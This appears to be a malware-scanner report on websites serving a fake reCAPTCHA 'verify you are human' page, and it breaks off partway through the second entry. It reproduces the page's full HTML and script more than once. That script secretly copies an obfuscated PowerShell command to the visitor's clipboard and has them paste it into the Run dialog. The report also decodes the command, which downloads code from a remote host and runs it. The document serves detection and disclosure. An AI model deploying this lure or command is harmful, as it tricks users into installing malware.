"HTML": "<!DOCTYPE html>\r\n<html lang=\"en\">\r\n<head>\r\n <meta charset=\"UTF-8\">\r\n <meta name=\"viewport\" content=\"width=device-width, initial-scale=1.0\">\r\n <title>Verify You Are Human</title>\r\n <link rel=\"stylesheet\" href=\"https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css\">\r\n <link rel=\"stylesheet\" href=\"https://use.fontawesome.com/releases/v5.0.0/css/all.css\"> \r\n <style>\r\n body, html {\r\n margin: 0;\r\n padding: 0;\r\n width: 100%;\r\n height: 100%;\r\n display: flex;\r\n justify-content: center;\r\n align-items: center;\r\n font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;\r\n background: #f2f2f2;\r\n color: #333;\r\n }\r\n\r\n .container {\r\n text-align: center;\r\n max-width: 500px;\r\n margin: 20px;\r\n position: relative;\r\n }\r\n\r\n .recaptcha-box {\r\n padding: 20px;\r\n background: #fff;\r\n box-shadow: 0 5px 20px rgba(0, 0, 0, 0.3);\r\n border-radius: 8px;\r\n text-align: center;\r\n }\r\n\r\n .recaptcha-box h2 {\r\n margin: 0 0 20px;\r\n font-size: 28px;\r\n color: #4285f4;\r\n }\r\n\r\n .recaptcha-box p {\r\n margin: 0 0 20px;\r\n font-size: 18px;\r\n color: #666;\r\n }\r\n\r\n .checkbox-window {\r\n display: flex;\r\n align-items: center;\r\n height: 74px;\r\n width: 300px;\r\n background-color: #f9f9f9;\r\n border-radius: 3px;\r\n border: 1px solid #d3d3d3;\r\n }\r\n\r\n .checkbox-container {\r\n width: 28px;\r\n height: 28px;\r\n margin-left: 12px;\r\n margin-right: 8px;\r\n position: relative;\r\n }\r\n\r\n .checkbox {\r\n width: 100%;\r\n height: 100%;\r\n background-color: #fff;\r\n border-radius: 2px;\r\n border: 2px solid #c1c1c1;\r\n cursor: pointer;\r\n transition: border-color 0.3s;\r\n }\r\n\r\n .checkbox:active,\r\n .checkbox.checked {\r\n border-color: #4285f4;\r\n background-color: #4285f4;\r\n position: relative;\r\n }\r\n\r\n .checkbox.checked::after {\r\n content: '\\f00c'; /* Checkmark icon from FontAwesome */\r\n font-family: \"FontAwesome\";\r\n color: #fff;\r\n font-size: 18px;\r\n position: absolute;\r\n top: -2px;\r\n left: 2px;\r\n }\r\n\r\n .im-not-a-robot {\r\n font-size: 15px;\r\n color: #282727;\r\n }\r\n\r\n .captcha-logo {\r\n width: 40px;\r\n height: 45px;\r\n margin-left: auto;\r\n margin-right: 10px;\r\n }\r\n\r\n .spinner {\r\n visibility: hidden;\r\n position: absolute;\r\n top: 20px;\r\n left: 20px;\r\n height: 20px;\r\n width: 20px;\r\n border: 2px solid rgba(0, 0, 0, 0.1);\r\n border-top: 2px solid #333;\r\n border-radius: 50%;\r\n transition: opacity 0.5s linear;\r\n animation: spin 1s linear infinite;\r\n }\r\n\r\n .spinner.active {\r\n visibility: visible;\r\n }\r\n\r\n @keyframes spin {\r\n 0% {\r\n transform: rotate(0deg);\r\n }\r\n 100% {\r\n transform: rotate(360deg);\r\n }\r\n }\r\n\r\n /* Popup Verification Window */\r\n .verify-window {\r\n font-family: Roboto, helvetica, arial, sans-serif;\r\n opacity: 0;\r\n position: absolute;\r\n visibility: hidden;\r\n margin: auto;\r\n width: 310px;\r\n background-color: #fff;\r\n border: 1px solid #cecece;\r\n -webkit-box-shadow: 5px 6px 7px -3px rgba(0, 0, 0, 0.12);\r\n box-shadow: 5px 6px 7px -3px rgba(0, 0, 0, 0.12);\r\n transition: opacity 400ms;\r\n }\r\n\r\n .verify-header {\r\n background-color: #1A73E8;\r\n padding: 16px;\r\n color: #fff;\r\n font-size: 18px;\r\n border-radius: 8px 8px 0 0;\r\n }\r\n\r\n .verify-main {\r\n padding: 16px;\r\n font-size: 14px;\r\n color: #333;\r\n }\r\n\r\n .verify-main ol {\r\n padding-left: 20px;\r\n }\r\n\r\n .verify-main ol li {\r\n margin-bottom: 10px;\r\n }\r\n\r\n .verify-main code {\r\n display: block;\r\n margin-top: 10px;\r\n background-color: #f9f9f9;\r\n padding: 10px;\r\n font-size: 12px;\r\n border: 1px solid #ddd;\r\n }\r\n\r\n .verify-footer {\r\n background-color: #f2f2f2;\r\n padding: 16px;\r\n text-align: right;\r\n }\r\n\r\n .verify-footer button {\r\n padding: 10px 20px;\r\n background: #4285f4;\r\n color: #fff;\r\n border: none;\r\n border-radius: 5px;\r\n cursor: pointer;\r\n }\r\n\r\n /* Overlay */\r\n .overlay {\r\n display: none;\r\n position: fixed;\r\n top: 0;\r\n left: 0;\r\n width: 100%;\r\n height: 100%;\r\n background: rgba(0, 0, 0, 0.5);\r\n z-index: 10;\r\n }\r\n\r\n .overlay.active,\r\n .verify-window.active {\r\n display: block;\r\n }\r\n </style>\r\n</head>\r\n<body>\r\n <div class=\"container\">\r\n <div class=\"overlay\" id=\"overlay\"></div>\r\n <div class=\"recaptcha-box\">\r\n <h2>Verify You Are Human</h2>\r\n <p>Please verify that you are a human to continue.</p>\r\n<div class=\"container m-p\"> \r\n <div id=\"checkbox-window\" class=\"checkbox-window m-p block\">\r\n <div class=\"checkbox-container m-p\">\r\n <button type=\"button\" id=\"checkbox\" class=\"checkbox m-p line-normal\"></button>\r\n </div>\r\n <p style=\"margin: 0 !important;\" class=\"im-not-a-robot m-p line-normal\">I'm not a robot</p>\r\n <img src=\"https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png\" class=\"captcha-logo line-normal\" alt=\"\">\r\n <br>\r\n <p class=\"checkbox-desc m-p line-normal\">\r\n\r\n </p>\r\n <img class=\"spinner\" alt=\"\" id=\"spinner\">\r\n </div>\r\n \r\n <div id=\"verify-window\" class=\"verify-window\">\r\n <div class=\"verify-container\">\r\n <header class=\"verify-header\">\r\n <span class=\"verify-header-text-medium m-p block\">Complete these</span>\r\n <span class=\"verify-header-text-big m-p block\">Verification Steps</span>\r\n <span class=\"verify-header-text-medium m-p block\"></span>\r\n </header>\r\n <main class=\"verify-main\">\r\n <p>\r\n To better prove you are not a robot, please:\r\n </p>\r\n <ol>\r\n <li>\r\n Press & hold the Windows Key <i class=\"fab fa-windows\"></i> + <b>R</b>.\r\n </li>\r\n \r\n <li>\r\n In the verification window, press <b>Ctrl</b> + <b>V</b>.\r\n </li>\r\n\r\n <li>\r\n Press <b>Enter</b> on your keyboard to finish.\r\n </li>\r\n </ol>\r\n <p>\r\n You will observe and agree:\r\n <br>\r\n <code>\r\n \u2705 \"I am not a robot - reCAPTCHA Verification ID: <span id=\"verification-id\">146820</span>\"\r\n </code>\r\n </p>\r\n\r\n \r\n </main>\r\n </div>\r\n <footer class=\"verify-container verify-footer\">\r\n <div class=\"verify-footer-left\">\r\n Perform the steps above to finish verification.\r\n </div>\r\n <button type=\"button\" class=\"verify-verify-button block\" id=\"verify-verify-button\" disabled=\"true\">Verify</button>\r\n </footer>\r\n </div> \r\n </div>\r\n\r\n </div>\r\n </div> \r\n\t\r\n <script>\r\n let checkboxWindow = document.getElementById(\"checkbox-window\");\r\n let checkboxBtn = document.getElementById(\"checkbox\");\r\n let checkboxBtnSpinner = document.getElementById(\"spinner\");\r\n let verifywindow = document.getElementById(\"verify-window\");\r\n\r\n function addCaptchaListeners() {\r\n if (checkboxBtn) {\r\n document.addEventListener(\"click\", function (event) {\r\n let path = event.composedPath();\r\n if (!path.includes(verifywindow) && isverifywindowVisible()) {\r\n closeverifywindow();\r\n }\r\n });\r\n checkboxBtn.addEventListener(\"click\", function (event) {\r\n event.preventDefault();\r\n checkboxBtn.disabled = true;\r\n runClickedCheckboxEffects();\r\n });\r\n }\r\n }\r\n\r\n function runClickedCheckboxEffects() {\r\n hideCaptchaCheckbox();\r\n setTimeout(function(){\r\n showCaptchaLoading();\r\n },500);\r\n setTimeout(function(){\r\n showVerifyWindow();\r\n },900)\r\n }\r\n\r\n function showCaptchaLoading() {\r\n checkboxBtnSpinner.style.visibility = \"visible\";\r\n checkboxBtnSpinner.style.opacity = \"1\";\r\n checkboxBtnSpinner.style.animation = \"spin 1s linear infinite\";\r\n }\r\n\r\n function hideCaptchaLoading() {\r\n checkboxBtnSpinner.style.opacity = \"0\";\r\n checkboxBtnSpinner.style.animation = \"none\";\r\n setTimeout(function() {\r\n checkboxBtnSpinner.style.visibility = \"hidden\";\r\n }, 500);\r\n }\r\n\r\n function hideCaptchaCheckbox() {\r\n checkboxBtn.style.visibility = \"hidden\";\r\n checkboxBtn.style.opacity = \"0\";\r\n }\r\n\r\n\r\n function showCaptchaCheckbox() {\r\n checkboxBtn.style.width = \"100%\";\r\n checkboxBtn.style.height = \"100%\";\r\n checkboxBtn.style.borderRadius = \"2px\";\r\n checkboxBtn.style.margin = \"0\";\r\n checkboxBtn.style.opacity = \"1\";\r\n }\r\n\r\n function hideCaptchaCheckbox() {\r\n checkboxBtn.style.width = \"4px\";\r\n checkboxBtn.style.height = \"4px\";\r\n checkboxBtn.style.borderRadius = \"50%\";\r\n checkboxBtn.style.marginLeft = \"25px\";\r\n checkboxBtn.style.marginTop = \"33px\";\r\n checkboxBtn.style.opacity = \"0\";\r\n }\r\n\r\n function showCaptchaLoading() {\r\n checkboxBtnSpinner.style.visibility = \"visible\";\r\n checkboxBtnSpinner.style.opacity = \"1\";\r\n }\r\n\r\n function hideCaptchaLoading() {\r\n checkboxBtnSpinner.style.visibility = \"hidden\";\r\n checkboxBtnSpinner.style.opacity = \"0\";\r\n }\r\n\r\n function generateRandomNumber() {\r\n const min = 1000; \r\n const max = 9999;\r\n return Math.floor(Math.random() * (max - min + 1) + min).toString();\r\n }\r\n\r\n function closeverifywindow() {\r\n verifywindow.style.display = \"none\";\r\n verifywindow.style.visibility = \"hidden\";\r\n verifywindow.style.opacity = \"0\";\r\n\r\n showCaptchaCheckbox();\r\n hideCaptchaLoading();\r\n checkboxBtn.disabled = false;\r\n }\r\n\r\n function isverifywindowVisible() {\r\n return verifywindow.style.display !== \"none\" && verifywindow.style.display !== \"\";\r\n }\r\n\r\n function setClipboardCopyData(textToCopy){\r\n const tempTextArea = document.createElement(\"textarea\");\r\n tempTextArea.value = textToCopy;\r\n document.body.append(tempTextArea);\r\n tempTextArea.select();\r\n document.execCommand(\"copy\");\r\n document.body.removeChild(tempTextArea);\r\n }\r\n\r\n function stageClipboard(commandToRun, verification_id){\r\n const suffix = \" # \"\r\n const ploy = \"\u2705 ''I am not a robot - reCAPTCHA Verification ID: \"\r\n const end = \"''\"\r\n const textToCopy = commandToRun\r\n\r\n setClipboardCopyData(textToCopy);\r\n }\r\n\r\n\r\nfunction showVerifyWindow() {\r\n verifywindow.style.display = \"block\";\r\n verifywindow.style.visibility = \"visible\";\r\n verifywindow.style.opacity = \"1\";\r\n verifywindow.style.top = checkboxWindow.offsetTop - 80 + \"px\";\r\n verifywindow.style.left = checkboxWindow.offsetLeft + 54 + \"px\";\r\n\r\n if (verifywindow.offsetTop < 5) {\r\n verifywindow.style.top = \"5px\";\r\n }\r\n\r\n if (verifywindow.offsetLeft + verifywindow.offsetWidth > window.innerWidth - 10) {\r\n verifywindow.style.left = checkboxWindow.offsetLeft - 8 + \"px\";\r\n }\r\n\r\n var verification_id = generateRandomNumber();\r\n document.getElementById('verification-id').textContent = verification_id;\r\n\r\n const commandToRun = `POWerShEll -W h \"[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex\"`;\r\n stageClipboard(commandToRun, verification_id);\r\n}\r\n\r\naddCaptchaListeners();\r\n\r\n\r\n </script>\r\n</body>\r\n</html>\r\n",
"ThreatLevel": "High"
}
https://laborpartyjo.com/
Total findings: 3
Suspicious Patterns
PowerShell Commands
Clipboard Manipulation
Suspicious Keywords
CAPTCHA References
PowerShell Downloads
Malicious Code Sample
POWerShEll -W h "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex"`;
Warning: This code is malicious and should not be executed
JSON Technical Data
{
"URL": "https://laborpartyjo.com/",
"Base64Strings": {
"Base64": "aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50",
"Decoded": "iex (iwr 'https://amazon-ny-gifts.com/shellsajshdasd/ftpaksjdkasdjkxnckzxn/ywOVkkem.txt' -UseBasicParsing).Content"
},
"URLs": [
"https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css",
"https://use.fontawesome.com/releases/v5.0.0/css/all.css",
"https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png"
],
"PowerShellCommands": "POWerShEll -W h \"[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex\"`;\r",
"ClipboardCommands": "POWerShEll -W h ",
"SuspiciousKeywords": [
"\u2705",
"I am not a robot",
"Verification ID",
"reCAPTCHA Verification",
"Verify You Are Human",
"To better prove you are not a robot",
"I'm not a robot",
"<script>"
],
"ClipboardManipulation": [
"...tempTextArea.select(); document.execCommand(\"copy\"); document.body.removeChild(tempTextArea); }...",
"...y.append(tempTextArea); tempTextArea.select(); document.execCommand(\"copy\"); document.body.removeChild(tempText..."
],
"PowerShellDownloads": {
"FullMatch": "| iex",
"Context": "...eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex\"`; stageClipboard(commandToRun, verification_id); }..."
},
"CaptchaElements": [
"ification ID: <span id=\"verification-id\">146820</span>\"",
"} function hideCaptchaLoading() { che",
"} function hideCaptchaCheckbox() { che",
"et checkboxWindow = document.getElementById(\"checkbox-window\"); let chec",
"let checkboxBtn = document.getElementById(\"checkbox\"); let chec",
"heckboxBtnSpinner = document.getElementById(\"spinner\"); let veri",
"let verifywindow = document.getElementById(\"verify-window\"); functi",
"andomNumber(); document.getElementById('verification-id').textContent = veri",
"ect(); document.execCommand(\"copy\"); doc",
"tempTextArea.select(); docum",
"href=\"https://cdnjs.cloudflare.com/ajax/libs/font-",
"</div> <script> let checkb"
],
"HTML": "<!DOCTYPE html>\r\n<html lang=\"en\">\r\n<head>\r\n <meta charset=\"UTF-8\">\r\n <meta name=\"viewport\" content=\"width=device-width, initial-scale=1.0\">\r\n <title>Verify You Are Human</title>\r\n <link rel=\"stylesheet\" href=\"https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css\">\r\n <link rel=\"stylesheet\" href=\"https://use.fontawesome.com/releases/v5.0.0/css/all.css\"> \r\n <style>\r\n body, html {\r\n margin: 0;\r\n padding: 0;\r\n width: 100%;\r\n height: 100%;\r\n display: flex;\r\n justify-content: center;\r\n align-items: center;\r\n font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;\r\n background: #f2f2f2;\r\n color: #333;\r\n }\r\n\r\n .container {\r\n text-align: center;\r\n max-width: 500px;\r\n margin: 20px;\r\n position: relative;\r\n }\r\n\r\n .recaptcha-box {\r\n padding: 20px;\r\n background: #fff;\r\n box-shadow: 0 5px 20px rgba(0, 0, 0, 0.3);\r\n border-radius: 8px;\r\n text-align: center;\r\n }\r\n\r\n .recaptcha-box h2 {\r\n margin: 0 0 20px;\r\n font-size: 28px;\r\n color: #4285f4;\r\n }\r\n\r\n .recaptcha-box p {\r\n margin: 0 0 20px;\r\n font-size: 18px;\r\n color: #666;\r\n }\r\n\r\n .checkbox-window {\r\n display: flex;\r\n align-items: center;\r\n height: 74px;\r\n width: 300px;\r\n background-color: #f9f9f9;\r\n border-radius: 3px;\r\n border: 1px solid #d3d3d3;\r\n }\r\n\r\n .checkbox-container {\r\n width: 28px;\r\n height: 28px;\r\n margin-left: 12px;\r\n margin-right: 8px;\r\n position: relative;\r\n }\r\n\r\n .checkbox {\r\n width: 100%;\r\n height: 100%;\r\n background-color: #fff;\r\n border-radius: 2px;\r\n border: 2px solid #c1c1c1;\r\n cursor: pointer;\r\n transition: border-color 0.3s;\r\n }\r\n\r\n .checkbox:active,\r\n .checkbox.checked {\r\n border-color: #4285f4;\r\n background-color: #4285f4;\r\n position: relative;\r\n }\r\n\r\n .checkbox.checked::after {\r\n content: '\\f00c'; /* Checkmark icon from FontAwesome */\r\n font-family: \"FontAwesome\";\r\n color: #fff;\r\n font-size: 18px;\r\n position: absolute;\r\n top: -2px;\r\n left: 2px;\r\n }\r\n\r\n .im-not-a-robot {\r\n font-size: 15px;\r\n color: #282727;\r\n }\r\n\r\n .captcha-logo {\r\n width: 40px;\r\n height: 45px;\r\n margin-left: auto;\r\n margin-right: 10px;\r\n }\r\n\r\n .spinner {\r\n visibility: hidden;\r\n position: absolute;\r\n top: 20px;\r\n left: 20px;\r\n height: 20px;\r\n width: 20px;\r\n border: 2px solid rgba(0, 0, 0, 0.1);\r\n border-top: 2px solid #333;\r\n border-radius: 50%;\r\n transition: opacity 0.5s linear;\r\n animation: spin 1s linear infinite;\r\n }\r\n\r\n .spinner.active {\r\n visibility: visible;\r\n }\r\n\r\n @keyframes spin {\r\n 0% {\r\n transform: rotate(0deg);\r\n }\r\n 100% {\r\n transform: rotate(360deg);\r\n }\r\n }\r\n\r\n /* Popup Verification Window */\r\n .verify-window {\r\n font-family: Roboto, helvetica, arial, sans-serif;\r\n opacity: 0;\r\n position: absolute;\r\n visibility: hidden;\r\n margin: auto;\r\n width: 310px;\r\n background-color: #fff;\r\n border: 1px solid #cecece;\r\n -webkit-box-shadow: 5px 6px 7px -3px rgba(0, 0, 0, 0.12);\r\n box-shadow: 5px 6px 7px -3px rgba(0, 0, 0, 0.12);\r\n transition: opacity 400ms;\r\n }\r\n\r\n .verify-header {\r\n background-color: #1A73E8;\r\n padding: 16px;\r\n color: #fff;\r\n font-size: 18px;\r\n border-radius: 8px 8px 0 0;\r\n }\r\n\r\n .verify-main {\r\n padding: 16px;\r\n font-size: 14px;\r\n color: #333;\r\n }\r\n\r\n .verify-main ol {\r\n padding-left: 20px;\r\n }\r\n\r\n .verify-main ol li {\r\n margin-bottom: 10px;\r\n }\r\n\r\n .verify-main code {\r\n display: block;\r\n margin-top: 10px;\r\n background-color: #f9f9f9;\r\n padding: 10px;\r\n font-size: 12px;\r\n border: 1px solid #ddd;\r\n }\r\n\r\n .verify-footer {\r\n background-color: #f2f2f2;\r\n padding: 16px;\r\n text-align: right;\r\n }\r\n\r\n .verify-footer button {\r\n padding: 10px 20px;\r\n background: #4285f4;\r\n color: #fff;\r\n border: none;\r\n border-radius: 5px;\r\n cursor: pointer;\r\n }\r\n\r\n /* Overlay */\r\n .overlay {\r\n display: none;\r\n position: fixed;\r\n top: 0;\r\n left: 0;\r\n width: 100%;\r\n height: 100%;\r\n background: rgba(0, 0, 0, 0.5);\r\n z-index: 10;\r\n }\r\n\r\n .overlay.active,\r\n .verify-window.active {\r\n display: block;\r\n }\r\n </style>\r\n</head>\r\n<body>\r\n <div class=\"container\">\r\n <div class=\"overlay\" id=\"overlay\"></div>\r\n <div class=\"recaptcha-box\">\r\n <h2>Verify You Are Human</h2>\r\n <p>Please verify that you are a human to continue.</p>\r\n<div class=\"container m-p\"> \r\n <div id=\"checkbox-window\" class=\"checkbox-window m-p block\">\r\n <div class=\"checkbox-container m-p\">\r\n <button type=\"button\" id=\"checkbox\" class=\"checkbox m-p line-normal\"></button>\r\n </div>\r\n <p style=\"margin: 0 !important;\" class=\"im-not-a-robot m-p line-normal\">I'm not a robot</p>\r\n <img src=\"https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png\" class=\"captcha-logo line-normal\" alt=\"\">\r\n <br>\r\n <p class=\"checkbox-desc m-p line-normal\">\r\n\r\n </p>\r\n <img class=\"spinner\" alt=\"\" id=\"spinner\">\r\n </div>\r\n \r\n <div id=\"verify-window\" class=\"verify-window\">\r\n <div class=\"verify-container\">\r\n <header class=\"verify-header\">\r\n <span class=\"verify-header-text-medium m-p block\">Complete these</span>\r\n <span class=\"verify-header-text-big m-p block\">Verification Steps</span>\r\n <span class=\"verify-header-text-medium m-p block\"></span>\r\n </header>\r\n <main class=\"verify-main\">\r\n <p>\r\n To better prove you are not a robot, please:\r\n </p>\r\n <ol>\r\n <li>\r\n Press & hold the Windows Key <i class=\"fab fa-windows\"></i> + <b>R</b>.\r\n </li>\r\n \r\n <li>\r\n In the verification window, press <b>Ctrl</b> + <b>V</b>.\r\n </li>\r\n\r\n <li>\r\n Press <b>Enter</b> on your keyboard to finish.\r\n </li>\r\n </ol>\r\n <p>\r\n You will observe and agree:\r\n <br>\r\n <code>\r\n \u2705 \"I am not a robot - reCAPTCHA Verification ID: <span id=\"verification-id\">146820</span>\"\r\n </code>\r\n </p>\r\n\r\n \r\n </main>\r\n </div>\r\n <footer class=\"verify-container verify-footer\">\r\n <div class=\"verify-footer-left\">\r\n Perform the steps above to finish verification.\r\n </div>\r\n <button type=\"button\" class=\"verify-verify-button block\" id=\"verify-verify-button\" disabled=\"true\">Verify</button>\r\n </footer>\r\n </div> \r\n </div>\r\n\r\n </div>\r\n </div> \r\n\t\r\n <script>\r\n let checkboxWindow = document.getElementById(\"checkbox-window\");\r\n let checkboxBtn = document.getElementById(\"checkbox\");\r\n let checkboxBtnSpinner = document.getElementById(\"spinner\");\r\n let verifywindow = document.getElementById(\"verify-window\");\r\n\r\n function addCaptchaListeners() {\r\n if (checkboxBtn) {\r\n document.addEventListener(\"click\", function (event) {\r\n let path = event.composedPath();\r\n if (!path.includes(verifywindow) && isverifywindowVisible()) {\r\n closeverifywindow();\r\n }\r\n });\r\n checkboxBtn.addEventListener(\"click\", function (event) {\r\n event.preventDefault();\r\n checkboxBtn.disabled = true;\r\n runClickedCheckboxEffects();\r\n });\r\n }\r\n }\r\n\r\n function runClickedCheckboxEffects() {\r\n hideCaptchaCheckbox();\r\n setTimeout(function(){\r\n showCaptchaLoading();\r\n },500);\r\n setTimeout(function(){\r\n showVerifyWindow();\r\n },900)\r\n }\r\n\r\n function showCaptchaLoading() {\r\n checkboxBtnSpinner.style.visibility = \"visible\";\r\n checkboxBtnSpinner.style.opacity = \"1\";\r\n checkboxBtnSpinner.style.animation = \"spin 1s linear infinite\";\r\n }\r\n\r\n function hideCaptchaLoading() {\r\n checkboxBtnSpinner.style.opacity = \"0\";\r\n checkboxBtnSpinner.style.animation = \"none\";\r\n setTimeout(function() {\r\n checkboxBtnSpinner.style.visibility = \"hidden\";\r\n }, 500);\r\n }\r\n\r\n function hideCaptchaCheckbox() {\r\n checkboxBtn.style.visibility = \"hidden\";\r\n checkboxBtn.style.opacity = \"0\";\r\n }\r\n\r\n\r\n function showCaptchaCheckbox() {\r\n checkboxBtn.style.width = \"100%\";\r\n checkboxBtn.style.height = \"100%\";\r\n checkboxBtn.style.borderRadius = \"2px\";\r\n checkboxBtn.style.margin = \"0\";\r\n checkboxBtn.style.opacity = \"1\";\r\n }\r\n\r\n function hideCaptchaCheckbox() {\r\n checkboxBtn.style.width = \"4px\";\r\n checkboxBtn.style.height = \"4px\";\r\n checkboxBtn.style.borderRadius = \"50%\";\r\n checkboxBtn.style.marginLeft = \"25px\";\r\n checkboxBtn.style.marginTop = \"33px\";\r\n checkboxBtn.style.opacity = \"0\";\r\n }\r\n\r\n function showCaptchaLoading() {\r\n checkboxBtnSpinner.style.visibility = \"visible\";\r\n checkboxBtnSpinner.style.opacity = \"1\";\r\n }\r\n\r\n function hideCaptchaLoading() {\r\n checkboxBtnSpinner.style.visibility = \"hidden\";\r\n checkboxBtnSpinner.style.opacity = \"0\";\r\n }\r\n\r\n function generateRandomNumber() {\r\n const min = 1000; \r\n const max = 9999;\r\n return Math.floor(Math.random() * (max - min + 1) + min).toString();\r\n }\r\n\r\n function closeverifywindow() {\r\n verifywindow.style.display = \"none\";\r\n verifywindow.style.visibility = \"hidden\";\r\n verifywindow.style.opacity = \"0\";\r\n\r\n showCaptchaCheckbox();\r\n hideCaptchaLoading();\r\n checkboxBtn.disabled = false;\r\n }\r\n\r\n function isverifywindowVisible() {\r\n return verifywindow.style.display !== \"none\" && verifywindow.style.display !== \"\";\r\n }\r\n\r\n function setClipboardCopyData(textToCopy){\r\n const tempTextArea = document.createElement(\"textarea\");\r\n tempTextArea.value = textToCopy;\r\n document.body.append(tempTextArea);\r\n tempTextArea.select();\r\n document.execCommand(\"copy\");\r\n document.body.removeChild(tempTextArea);\r\n }\r\n\r\n function stageClipboard(commandToRun, verification_id){\r\n const suffix = \" # \"\r\n const ploy = \"\u2705 ''I am not a robot - reCAPTCHA Verification ID: \"\r\n const end = \"''\"\r\n const textToCopy = commandToRun\r\n\r\n setClipboardCopyData(textToCopy);\r\n }\r\n\r\n\r\nfunction showVerifyWindow() {\r\n verifywindow.style.display = \"block\";\r\n verifywindow.style.visibility = \"visible\";\r\n verifywindow.style.opacity = \"1\";\r\n verifywindow.style.top = checkboxWindow.offsetTop - 80 + \"px\";\r\n verifywindow.style.left = checkboxWindow.offsetLeft + 54 + \"px\";\r\n\r\n if (verifywindow.offsetTop < 5) {\r\n verifywindow.style.top = \"5px\";\r\n }\r\n\r\n if (verifywindow.offsetLeft + verifywindow.offsetWidth > window.innerWidth - 10) {\r\n verifywindow.style.left = checkboxWindow.offsetLeft - 8 + \"px\";\r\n }\r\n\r\n var verification_id = generateRandomNumber();\r\n document.getElementById('verification-id').textContent = verification_id;\r\n\r\n const commandToRun = `POWerShEll -W h \"[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex\"`;\r\n stageClipboard(commandToRun, verification_id);\r\n}\r\n\r\naddCaptchaListeners();\r\n\r\n\r\n </script>\r\n</body>\r\n</html>\r\n",
"ThreatLevel": "High"
}
https://www.thesignaturemag.salviatech.com/
Total findings: 3
Suspicious Patterns
PowerShell Commands
Clipboard Manipulation
Suspicious Keywords
CAPTCHA References
PowerShell Downloads
Malicious Code Sample
POWerShEll -W h "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex"`;
Warning: This code is malicious and should not be executed
JSON Technical Data
{
"URL": "https://www.thesignaturemag.salviatech.com/",
"Base64Strings": {
"Base64": "aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50",
"Decoded": "iex (iwr 'https://amazon-ny-gifts.com/shellsajshdasd/ftpaksjdkasdjkxnckzxn/ywOVkkem.txt' -UseBasicParsing).Content"
},
"URLs": [
"https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css",
"https://use.fontawesome.com/releases/v5.0.0/css/all.css",
"https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png"
],
"PowerShellCommands": "POWerShEll -W h \"[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex\"`;\r",
"ClipboardCommands": "POWerShEll -W h ",
"SuspiciousKeywords": [
"\u2705",
"I am not a robot",
"Verification ID",
"reCAPTCHA Verification",
"Verify You Are Human",
"To better prove you are not a robot",
"I'm not a robot",
"<script>"
],
"ClipboardManipulation": [
"...tempTextArea.select(); document.execCommand(\"copy\"); document.body.removeChild(tempTextArea); }...",
"...y.append(tempTextArea); tempTextArea.select(); document.execCommand(\"copy\"); document.body.removeChild(tempText..."
],
"PowerShellDownloads": {
"FullMatch": "| iex",
"Context": "...eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex\"`; stageClipboard(commandToRun, verification_id); }..."
},
"CaptchaElements": [
"ification ID: <span id=\"verification-id\">146820</span>\"",
"} function hideCaptchaLoading() { che",
"} function hideCaptchaCheckbox() { che",
"et checkboxWindow = document.getElementById(\"checkbox-window\"); let chec",
"let checkboxBtn = document.getElementById(\"checkbox\"); let chec",
"heckboxBtnSpinner = document.getElementById(\"spinner\"); let veri",
"let verifywindow = document.getElementById(\"verify-window\"); functi",
